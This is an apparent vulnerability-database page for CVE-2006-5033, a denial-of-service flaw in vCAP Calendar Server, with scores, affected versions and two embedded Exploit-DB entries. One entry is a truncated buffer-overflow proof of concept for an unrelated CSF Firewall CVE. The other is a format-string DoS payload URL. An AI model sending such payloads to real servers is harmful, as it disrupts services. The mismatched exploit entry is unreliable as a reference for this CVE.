CVE-2006-5033
published 2006-09-27CVE-2006-5033: Unspecified vulnerability in StoresAndCalendarsList.cgi in Paul Smith Computer Services vCAP 1.9.0 Beta and earlier allows remote attackers to cause a denial…
PriorityP421medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
3.55%
87.9th percentile
Unspecified vulnerability in StoresAndCalendarsList.cgi in Paul Smith Computer Services vCAP 1.9.0 Beta and earlier allows remote attackers to cause a denial of service via the session parameter, possibly related to format string specifiers or malformed URL encoding.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| paul_smith_computer_services | vcap | <= 1.9.0_beta | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
CSF Firewall - Buffer Overflow (PoC)
exploitdb·2011-12-09
CVE-2011-5033 CSF Firewall - Buffer Overflow (PoC)
CSF Firewall - Buffer Overflow (PoC)
---
/*
############################################################################
# Exploit Title: CSF Firewall Buffer overflow p0c
# DownLoaD : http://www.configserver.com/free/csf.tgz
# Date: 2011-12-09
# Author: FoX HaCkEr
# site : www.sec4ever.com
# MaiL : [email protected]
# Tested on: CentOS3/4
############################################################################
FiLe : CSF.c
*/
/*
* Copyright 2006-2011, Way to the Web Limited
* URL: http://www.configserver.com
* Email: [email protected]
*/
#include
#include
#include
#include
#include
main ()
{
FILE *adminFile;
uid_t ruid;
char name[100];
struct passwd *pw;
int admin = 0;
ruid = getuid();
pw = getpwuid(ruid);
adminFile=fopen ("/usr/local/directadmin/data/admin/admin.list","r");
wh
Exploit-DB
Paul Smith Computer Services VCAP Calendar Server 1.9 - Remote Denial of Service
exploitdb·2006-09-12
CVE-2006-5033 Paul Smith Computer Services VCAP Calendar Server 1.9 - Remote Denial of Service
Paul Smith Computer Services VCAP Calendar Server 1.9 - Remote Denial of Service
---
source: https://www.securityfocus.com/bid/19959/info
vCAP Calendar Server is prone to a remote denial-of-service vulnerability. This issue is due to a design error.
An attacker can exploit this issue to crash the application, effectively denying service.
vCAP Calendar Server 1.9.0 Beta and prior versions are vulnerable to this issue.
http://www.example.com:6100/StoresAndCalendars List.cgi?session=%d%d%d%d%d
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/fulldisclosure/2006-09/0187.htmlhttp://secunia.com/advisories/21862http://securitytracker.com/id?1016822http://www.morx.org/vcap.txthttp://www.osvdb.org/28807http://www.securityfocus.com/bid/19959http://www.vupen.com/english/advisories/2006/3569https://exchange.xforce.ibmcloud.com/vulnerabilities/28872http://archives.neohapsis.com/archives/fulldisclosure/2006-09/0187.htmlhttp://secunia.com/advisories/21862http://securitytracker.com/id?1016822http://www.morx.org/vcap.txthttp://www.osvdb.org/28807http://www.securityfocus.com/bid/19959http://www.vupen.com/english/advisories/2006/3569https://exchange.xforce.ibmcloud.com/vulnerabilities/28872
2006-09-27
Published